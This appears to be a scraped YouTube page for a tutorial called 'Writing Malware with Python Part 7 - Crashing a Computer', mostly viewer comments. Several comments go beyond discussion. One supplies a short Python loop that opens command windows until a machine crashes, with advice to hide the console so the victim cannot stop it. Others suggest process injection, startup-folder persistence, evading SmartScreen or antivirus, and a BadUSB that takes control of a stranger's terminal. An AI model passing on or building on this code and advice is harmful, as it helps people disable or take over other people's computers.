Writing Malware with Python Part 7 - Crashing a Computer

preview_player
Показать описание
Learning Malware with Python Playlist:

In this video we make a program that will render a PC unusable until it crashes with just a few lines of code
Рекомендации по теме
Комментарии
Автор

I made a script which pulls up a couple of Rick roll tabs and it crashed my computer, essentially. I never even intended it to be malware, I just intended it to be a prank program.

CoolModderJaydonX
Автор

You're a demon for feeding the scriptkiddies :D

trinity
Автор

You could have:
made the python script do a process injection of the actual malware, then write a bat to the startup files that starts the system file. You also could have used threading to make the windows go faster.

samsepiol
Автор

Heyy bro!!
Please continue this series? 🥺

earthonmusic
Автор

I really really like your video....Bro need more malware tutorials using python socket module also...please

saurrav
Автор

Hi Esper for some reason, when I run the exe it complains that the file doesn't exist in AppData\Temp\_MExyz\main.exe (the name of my file) and then it fails. (I am running it under winodws 8) is there any solution for it?

khanstudy
Автор

Oh cool. Let me just hit the test button to see if I programmed everything correctly...

aurorastudios
Автор

Can u write spyware for tutorial air..

aditromeo
Автор

Explain how smart screen didn’t pick that up? I know that any python compiled will trigger smart screen. So please explain. This would really be nice to avoid writing more code like dll injection and stuff. What is your VM setup? Did you turn off smart screen?

MamaMiaoo
Автор

i will add this as a function in my ultimate bad usb, i can control terminal of the the man who plug my usb flashdrive and i cando anything i want, i can also add more function like now

Youssef-_-Lmouden
Автор

while True:
print("byebye"*2**61)

embassyofidk
Автор

how does the converter work? i installed it and dried to put the exe in to a folder now i get a error saying: fatal python error init_fs coding failed to get python codc of the filesystem encoding pyttthon runtime state: core intillazed modulenotfound error no module named 'encodings'

kelopyy
Автор

Cool do you have do disable antivirus for this to work though?

MrBluesky-jsfz
Автор

doesn't the victim computer have to have python installed on it for this to actually be able to work? seems pretty useless except for rare use cases

Jay-uczy
Автор

Can you make a malware thats turn off cpu fan and increase its temperature above 100°C.

dpmynnq
Автор

Can we alter the file to maybe rik rol or some other funny pop ups

skrrr.dop.dop
Автор

I currently havent been able to afford windows machine so from a school school chromebook downloaded linux and a VM and after running the program it says couldnt connect to localhost... any thoughts

andrewk
Автор

CMD says: 'pip' is not recognized as an internal or external command,
operable program or batch file. What should i do?

x_xone_e
Автор

lol this kind of one-line malware i've made it when i was 10 yo pranking my class mates during our educational session. i was trying to simulate kevin's mitnick trick to grab everyone's passwds.

detective
Автор

Hey for me this code did not work if this has happened to you guys try this:



import os
while True:
os.system("start") # will open many windows, takes about 500 windows to crack a normal computer



if you use this make sure its not a console based program when you convert it to exe because all the user needs to do is close it to stop it from opening command prompt.

friedpizza